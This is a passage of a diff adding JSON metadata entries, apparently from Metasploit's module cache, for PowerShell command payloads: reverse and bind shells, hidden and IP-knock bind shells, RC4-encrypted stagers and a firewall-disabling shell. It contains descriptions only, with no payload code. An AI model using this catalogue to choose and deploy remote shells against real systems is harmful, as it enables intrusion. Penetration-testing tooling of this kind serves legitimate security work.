"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/powershell_reverse_tcp_ssl": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/powershell/shell/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Windows Command Shell, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/shell/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. 
This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/shell/bind_hidden_tcp": { + "name": "Powershell Exec, Windows Command Shell, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/shell/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/shell/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/shell/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": 
"payload/cmd/windows/powershell/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/shell/bind_named_pipe": { + "name": "Powershell Exec, Windows Command Shell, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": 
"cmd/windows/powershell/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/shell/bind_nonx_tcp": { + "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/shell/bind_tcp": { + "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape 
" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/shell/bind_tcp_rc4": { + "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": 
"windows/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/shell/bind_tcp_uuid": { + "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/shell/find_tag": { + "name": "Powershell Exec, Windows Command Shell, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/find_tag", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/shell/reverse_ipv6_tcp": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/shell/reverse_nonx_tcp": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP 
Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/shell/reverse_ord_tcp": { + "name": "Powershell Exec, Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_ord_tcp", 
+ "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp_allports": { + "name": "Powershell Exec, Windows Command Shell, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 
payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp_dns": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + 
"adapted_refname": "windows/shell/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp_rc4": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell 
(staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp_uuid": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/shell", 
+ "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/shell/reverse_udp": { + "name": "Powershell Exec, Windows Command Shell, Reverse UDP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/shell/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "RageLtMan " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_udp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_udp" + }, + "payload_cmd/windows/powershell/shell_bind_tcp": { + "name": "Powershell Exec, Windows Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/powershell/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/shell_bind_tcp_xpfw": { + "name": "Powershell Exec, Windows Disable Windows ICF, Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/powershell/shell_bind_tcp_xpfw", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Lin0xx " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nDisable the Windows ICF, then listen for a connection and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell_bind_tcp_xpfw", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell_bind_tcp_xpfw", + "staged": false + }, + "payload_cmd/windows/powershell/shell_hidden_bind_tcp": { + "name": "Powershell Exec, Windows Command Shell, Hidden Bind TCP Inline", + "fullname": "payload/cmd/windows/powershell/shell_hidden_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sd", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via 
PowerShell.\n\nListen for a connection from certain IP and spawn a command shell.\nThe shellcode will reply with a RST packet if the connections is not\ncoming from the IP defined in AHOST. This way the port will appear\nas \"closed\" helping us to hide the shellcode.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell_hidden_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell_hidden_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/shell_reverse_tcp": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/powershell/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": 
"cmd/windows/powershell", + "adapted_refname": "windows/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/speak_pwned": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/speak_pwned", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Berend-Jan \"SkyLined\" Wever " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/speak_pwned", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/speak_pwned", + "staged": false + }, + "payload_cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + 